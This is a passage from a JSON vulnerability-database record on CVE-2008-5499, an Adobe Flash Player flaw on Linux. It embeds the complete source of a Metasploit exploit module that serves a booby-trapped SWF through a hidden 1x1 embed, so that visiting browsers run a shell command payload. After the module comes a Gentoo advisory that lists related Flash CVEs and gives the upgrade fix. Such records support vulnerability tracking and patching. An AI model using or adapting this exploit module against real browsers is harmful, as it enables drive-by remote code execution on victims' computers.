10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36).\n", "published": "2012-04-10T19:58:22", "type": "metasploit", "title": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2017-08-29T00:17:58", "id": "MSF:EXPLOIT/LINUX/BROWSER/ADOBE_FLASHPLAYER_ASLAUNCH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in Adobe Flash Player for Linux,\n version 10.0.12.36 and 9.0.151.0 and prior.\n An input validation vulnerability allows command execution when the browser\n loads a SWF file which contains shell metacharacters in the arguments to\n the ActionScript launch method.\n\n The victim must have Adobe AIR installed for the exploit to work. 
This module\n was tested against version 10.0.12.36 (10r12_36).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2008-5499'],\n ['OSVDB', '50796'],\n ['BID', '32896'],\n ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']\n ],\n 'DefaultOptions' =>\n {\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true\n },\n 'Platform' => 'unix', # so unix cmd exec payloads are ok\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Automatic', {}],\n ],\n 'DisclosureDate' => 'Dec 17 2008',\n 'DefaultTarget' => 0))\n\n end\n\n def exploit\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2008-5499.swf\" )\n fd = File.open( path, \"rb\" )\n @swf = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n def on_request_uri(cli, request)\n msg = \"#{cli.peerhost.ljust(16)} #{self.shortname}\"\n trigger = @swf\n trigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\n\n obj_id = rand_text_alpha(rand(6)+3)\n\n if request.uri.match(/\\.swf/i)\n print_status(\"#{msg} Sending Exploit SWF\")\n send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\n return\n end\n\n if request.uri.match(/\\.txt/i)\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\n return\n end\n\n html = <<-EOS\n <html>\n <head>\n </head>\n <body>\n <center>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" id=\"#{obj_id}\" width=\"1\" height=\"1\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{get_resource}#{trigger_file}\" />\n <embed src=\"#{get_resource}#{trigger_file}\" quality=\"high\" width=\"1\" height=\"1\" name=\"#{obj_id}\" align=\"middle\" allowNetworking=\"all\"\n type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\">\n </embed>\n\n </object>\n </center>\n\n </body>\n </html>\n EOS\n\n 
print_status(\"#{msg} Sending HTML...\")\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the popular SWF file format, which is commonly used to provide interactive websites, digital experiences and mobile content. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player: \n\n * The access scope of SystemsetClipboard() allows ActionScript programs to execute the method without user interaction (CVE-2008-3873).\n * The access scope of FileReference.browse() and FileReference.download() allows ActionScript programs to execute the methods without user interaction (CVE-2008-4401).\n * The Settings Manager controls can be disguised as normal graphical elements. 
This so-called \"clickjacking\" vulnerability was disclosed by Robert Hansen of SecTheory, Jeremiah Grossman of WhiteHat Security, Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu of TopsecTianRongXin (CVE-2008-4503).\n * Adam Barth (UC Berkeley) and Collin Jackson (Stanford University) discovered a flaw occurring when interpreting HTTP response headers (CVE-2008-4818).\n * Nathan McFeters and Rob Carter of Ernst and Young's Advanced Security Center are credited for finding an unspecified vulnerability facilitating DNS rebinding attacks (CVE-2008-4819).\n * When used in a Mozilla browser, Adobe Flash Player does not properly interpret jar: URLs, according to a report by Gregory Fleischer of pseudo-flaw.net (CVE-2008-4821).\n * Alex \"kuza55\" K. reported that Adobe Flash Player does not properly interpret policy files (CVE-2008-4822).\n * The vendor credits Stefano Di Paola of Minded Security for reporting that an ActionScript attribute is not interpreted properly (CVE-2008-4823).\n * Riley Hassell and Josh Zelonis of iSEC Partners reported multiple input validation errors (CVE-2008-4824).\n * The aforementioned researchers also reported that ActionScript 2 does not verify a member element's size when performing several known and other unspecified actions, that DefineConstantPool accepts an untrusted input value for a \"constant count\" and that character elements are not validated when retrieved from a data structure, possibly resulting in a null-pointer dereference (CVE-2008-5361, CVE-2008-5362, CVE-2008-5363).\n * The vendor reported an unspecified arbitrary code execution vulnerability (CVE-2008-5499).\n * Liu Die Yu of TopsecTianRongXin reported an unspecified flaw in the Settings Manager related to \"clickjacking\" (CVE-2009-0114).\n * The vendor credits Roee Hay from IBM Rational Application Security for reporting an input validation error when processing SWF files (CVE-2009-0519).\n * Javier Vicente Vallejo reported via the iDefense VCP that Adobe 
Flash does not remove object references properly, leading to a freed memory dereference (CVE-2009-0520).\n * Josh Bressers of Red Hat and Tavis Ormandy of the Google Security Team reported an untrusted search path vulnerability (CVE-2009-0521).\n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in the execution of arbitrary code with the privileges of the user or a Denial of Service (crash). Furthermore a remote attacker could gain access to sensitive information, disclose memory contents by enticing a user to open a specially crafted PDF file inside a Flash application, modify the victim's clipboard or render it temporarily unusable, persuade a user into uploading or downloading files, bypass security restrictions with the assistance of the user to gain access to camera and microphone, conduct Cross-Site Scripting and HTTP Header Splitting attacks, bypass the \"non-root domain policy\" of Flash, and gain escalated privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-10.0.22.87\"", "modified": "2009-05-28T00:00:00", "published": "2009-03-10T00:00:00", "id": "GLSA-200903-23", "href": "https://security.gentoo.org/glsa/200903-23", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}